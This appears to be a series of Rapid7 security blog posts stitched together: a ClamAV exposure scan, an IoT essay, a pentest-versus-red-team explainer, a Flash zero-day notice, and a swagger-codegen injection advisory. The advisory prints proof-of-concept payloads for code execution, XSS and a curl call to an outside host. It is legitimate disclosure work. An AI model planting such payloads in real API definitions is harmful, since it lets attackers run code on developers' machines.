A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response.

 

Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings.

 

Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post) a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP pot 3310, including nearly:

 

  • 16,000 squid proxy servers
  • 600 nginx servers (20,000 HTTP servers in all)
  • 500 database servers
  • 600 SSH servers

 

But, you came here to learn about the ClamAV servers, so let's dig in.

 

Clam Hunting

 

We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses.

 

5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions:

 

found_servers.pngYou can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forgot" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.

 

lastbit.png

 

A Banner Haul

 

Now, not all VERSION queries respond with complete banner information but over half did and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes.

 

hygiene.png

 

As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments.

 

As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes:

 

ASAS NameCount%
4766KIXS-AS-KR Korea Telecom, KR1,73329.1%
16276OVH, FR5138.6%
3786LGDACOM LG DACOM Corporation, KR3165.3%
25394MK-NETZDIENSTE-AS, DE2824.7%
35053PHADE-AS, DE2634.4%
11994CZIO-ASN - Cruzio, US2514.2%
41541SWEB-AS Serveisweb, ES1752.9%
9318HANARO-AS Hanaro Telecom Inc., KR1472.5%
23982SENDB-AS-KR Dongbu District Office of Education in Seoul, KR1041.7%
24940HETZNER-AS, DE651.1%

 

Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger:

 

CountryCount%
1Korea, Republic of2,46341.4%
2Germany83014.0%
3United States65911.1%
4France5128.6%
5Spain2163.6%
6Italy1712.9%
7United Kingdom991.7%
8Russian Federation781.3%
9Japan671.1%
10Brazil621.0%

 

 

What are some takeaways from these findings?

 

  • Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners.

  • While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet.

  • Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet.

  • Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice.

  • Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming.

  • Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally.

 

Fin

 

Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on.

 

Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

Nearly every conversation I have had around the Internet of Things (IoT) and what it means to an organization starts off with the question, “What is IoT?” This question is often followed by many people giving many different answers. I'm sure I won't solve this problem here in a single blog post, but I hope to add some food for thought.

 

What IoT is Not

 

You would expect to start off with a list of things that make up IoT, but I was thinking maybe the first thing is to define what it is not, if that is even doable. Reading through a 2014 article in NetworkWorld, “Eight Internet Things That are Not IoT” we find the following list of items analysts have listed as not being IoT:

 

  • Desktops
  • Laptops
  • Tablets
  • Smartphones
  • Traditional Mobile Phones
  • TVs
  • DVD/MP3 players
  • Game consoles

 

This list demonstrates how fast technology is evolving.  While it was a pretty solid list when it was created two years ago, I think we can all agree that today, it's no longer accurate. Significant technological innovations in a number of these items means they are now considered either to be IoT in themselves, or directly tied to an IoT ecosystem. For example, smart TVs have the ability to watch us, record our every move, and communicate that information to a cloud API over the Internet. They also allow us to communicate and control them via voice and applications on our laptops, tablets, and smartphones.

 

poltergeist5.jpeg

 

Though the article discussed what is not classified as IoT based on its physical purpose, or requiring human interaction, it has quickly become outdated. Using this information, we can conclude that given the rate of innovation, what isn't categorized as IoT today, may very well be tomorrow, so trying to define what isn't IoT isn't necessarily the best direction to go in.

 

Traits of IoT

 

Maybe the better way to answer, “What is IoT?” is by defining the functions that make something IoT. Although, this process does have its own issues. For example, to be classified as a part of IoT, must it communicate to the Internet? If we claim that this is a litmus test for determining it, a large quantity of technologies currently classified as IoT that are in use with industrial and enterprise areas would not meet this requirement.

 

After reading through a number of documents and papers on the matter and reading many definitions there are four common elements I have identified that are part of the typical identification of IoT:

 

  • Interrelated devices: IoT environments always consist of multiple interrelated systems and technologies which can include: gateways, sensors, actuators, mobile technology, cloud systems and host systems.
  • Collecting and sharing data: IoT technology is always found to collect and/or share data from sensors and controllers. This data may be a simple as audio commands from your smart TV to the cloud, or as sensitive as data from a temperature sensor used to control a high pressure boiler system within a SCADA environment.
  • Networked together: IoT systems are always network interconnected. This is required to facilitate the exchange of data between the interrelated devices that make up an IoT environment.
  • Embedded electronics: Embedded electronics is the corner stone of the IoT. Their specialized functionality and reduction in size has helped fuel the growth of IoT. Without it, IoT would not exist.

 

Devices vs. Ecosystem

 

Of course, these four items on their own do not completely define IoT, or better stated, do not completely define the IoT ecosystem. Before we dig into the remainder of this definition, let's explore the concept of an IoT ecosystem. This is key to understanding IoT - we should not consider the technology as stand-alone devices, but rather as elements of a rich, interconnected, technological ecosystem. In a previous blog I stated the following:

 

“ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology.”

 

The ecosystem encompasses all of the interrelated parts that make an IoT solution work. Based on that, I believe any device or technology can be part of an existing IoT ecosystem, including desktop computers. If we try to label any technology as “not IoT” we are going to end up either rewriting the rules six months down the road or completely failing when we try to properly define security risk as they relate to deployed IoT solutions. The best way to solve these issues is to understand what an IoT ecosystem is so that we can more effectively define risk and develop solutions to mitigate those risks.

 

Traits of an IoT Ecosystem

 

As I said before, the IoT is not about stand-alone devices and if we try to approach it that way we will fall short trying to secure it. IoT is an environment that has an ecosystem that encompasses multiple devices (physical and virtual), technologies (mobile, cloud, etc.), communication methods (Ethernet, Wifi, Zigbee, etc.), and locations (internet, cloud, remote monitoring and control).

 

Continuing down that path, the following five bullets expand on the Traits of IoT listed above. There is no need for all of these to exist, but typically I find at least a couple of these items do apply to all IoT ecosystems I have encountered.

 

  • Mobile technology
  • Multiple end nods (sensors, actuators)
  • Cloud APIs
  • Multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave)
  • Remote Monitoring or Control

 

I believe by combining these two lists above into a series of questions we can identify the most common traits that make up an IoT ecosystem. This will help us identify the "whole" of an IoT ecosystem. In the end, by properly understanding and identifying the ecosystem we can better test, maintain, and properly secure our rapidly expanding IoT world.

 

  • Which interrelated devices interact as part of this IoT environment?
  • How and where do they collect and share data?
  • Which technologies are networked together?
  • Which systems utilize embedded electronics?
  • Does it use mobile technology? How and where?
  • Are multiple end nods (sensors, actuators) being used?
  • What and where are the Cloud APIs and how do they interrelate?
  • Are multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave) being used? Which ones?
  • What systems and locations use remote monitoring or control?

 

Hopefully I have given some food for thought and we can work on answering the bigger question, “What is the IoT ecosystem and how do we secure it?” I would love to hear your thoughts on this subject as we work together to secure the world of IoT.

In a fight between pirates and ninjas, who would win? I know what you are thinking. “What in the world does this have to do with security?” Read on to find out but first, make a choice: Pirates or Ninjas?

 

Before making that choice, we must know what the strengths and weaknesses are for each:

 

pirate_vs__ninja_by_majorwhoabutwhy-d36k6go.png

Pirates

Strengths

Weaknesses

Strong

Loud

Brute-Force Attack

Drunk (Some say this could be a strength too)

Great at Plundering

Can be Careless

Long-Range Combat

 

 

Ninjas

Strengths

Weaknesses

Fast

No Armor

Stealthy

Small

Dedicated to Training

 

Hand-to-Hand/Sword Combat

 

 

pirates_vs_ninjas_by_kino18.jpg

 

It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.

 

The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.

 

Penetration Testing

 

Penetration testing is usually rolled into one big umbrella with all security assessments. A lot of people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. However, this is a misconception. While they may have similar components, each one is different and should be used in different contexts.

 

At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk of the vulnerability. This does not necessarily mean uncovering new vulnerabilities (zero days), it's more often looking for known, unpatched vulnerabilities. Just like Vulnerability Assessments, Penetration Testing is designed to find vulnerabilities and assess to ensure they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not or Domain Administrator is not enough.

 

Who needs a penetration test? Some governing authorities require it, such as SOX and HIPAA, but organizations already performing regular security audits internally, and implementing security training and monitoring, are likely ready for a penetration test.

 

Red Team Assessment

 

A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could be over 3-4 weeks or longer, and often consists of multiple people.

 

A Red Team Assessment does not look for multiple vulnerabilities but for those vulnerabilities that will achieve their goals. The goals are often the same as the Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone though and should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.

 

The Red Team Assessment might consist of the following:

 

A member of the Red Team poses as a Fed-Ex delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices that will take the sights off the device placed. The Team members then pivot around the network until they reach their goal, taking their time to avoid detection.

 

This is just one of innumerable methods a Red Team may operate but is a good example of some tests we have performed.

 

pirate-vs-ninja-3-resize-575.jpg

 

So... Pirates or Ninjas?

 

Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer in Penetration Test vs. Red Team is just like pirates vs. ninjas; one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates to perform stealth operations and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how well your incident response is and you would not want to perform a Red Team assessment to discover vulnerabilities.

This disclosure will address a class of vulnerabilities in a Swagger Code Generator in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. This vulnerability applies to NodeJS, PHP, Ruby, and Java and probably other languages as well.  Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can inject arbitrary execution code embedded with a client or server generated automatically to interact with the definition of service.  This is considered an abuse of trust in definition of service, and could be an interesting space for further research.

 

According to swagger.io - “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.

 

Within the Swagger ecosystem, there are fantastic code generators which are designed to automagically take a Swagger document and then generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to provide developers the ability to quickly make use of their APIs. The Swagger definitions are flexible enough to describe most RESTful API’s and give developers a great starting point for their API client. The problems discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document which results in a classic parameter injection, with a new twist on code generation.

 

Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is achieved by the fact that some parsers/generators trust insufficiently sanitized parameters within a Swagger document to generate a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source and public services provided by smartbear.com such as generator.swagger.io, editor.swagger.io, and swaggerhub.com. Other commercial products include restlet.com (restlet-studio) and restunited.com. These services appear to generate and store these artifacts (but not execute) and are able to be publicly downloaded and consumed. Remote code execution is achieved when the download artifact is executed on the target.

Server Side

Online services exist that consume Swagger documents and automatically generate and execute server-side application, test specs, and mock servers provide a potential for remote code execution. Some identified commercial platforms that follow this model include: vRest.io, ritc.io, restunited.com, stoplight.io, and runscope.com.

Credit

These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.

Exploitation

Please see the associated Metasploit exploit module for examples for the following languages.

swagger-codegen

Swagger-codegen generates client and server code based on a Swagger document in which it trusts to specify inline variables in code unescaped (i.e. unescaped handlebars template variables). The javascript, html, php, ruby and java clients were tested for parameter injection vulnerabilities, and given in example as follows.

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {

 

html

Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",

 

php

Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",

 

ruby

Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\" http://requestb.in/1ftnzfy1`"

java

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 

 

Mitigations

Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.

 

Fixes need to be implemented by those creating code generation tools, in general this does not apply to the swagger documents themselves. Mitigations for all issues include properly escaping parameters before injecting, while taking into account the context the variable(s) are used in inline code creation, and what sanitization efforts are in place to ensure the context of trust for an API specification can maintain a level of code creation free for remote code execution in the known, easily avoidable cases.

 

For example, using double brackets {{, instead of {{{ for handlebars templates will usually prevent many types of injection attacks that involve single or double quote termination, however this will not stop a determined attacker who can inject variables without sanitization logic into multi-line comments, inline code or variables.

 

Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable in template and sanitization logic
  • {{ code }} can be vulnerable given context language of template (e.g. block quote)

Where to be wary

  • inline code creation from variable
  • single ticks (') and quotes (") unescaped variable injection
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ', in single quoted path strings.
  • encode ", in double quoted path strings

 

It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at Swagger.io.
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.

 

Future of Swagger

Starting January 1st, 2016, the Swagger Specification has been donated to the Open API Initiative (OAI) and is the foundation of the OpenAPI Specification.  However, the name ‘Swagger’ is still the preferred naming in many a dinner party and dad joke, and was used in this document when referring to an OAS 2.0 specification documentation.  In the typical case, a Swagger document defines a RESTful API.  It implements a subset of the JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash 21.0.0.242 that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.

 

So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.

 

Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.

 

Our products teams here at Rapid7 are alert to this news, and will be working up solutions in Nexpose and Metasploit to cover this vulnerability, and this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your java vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.

Filter Blog

By date: By tag: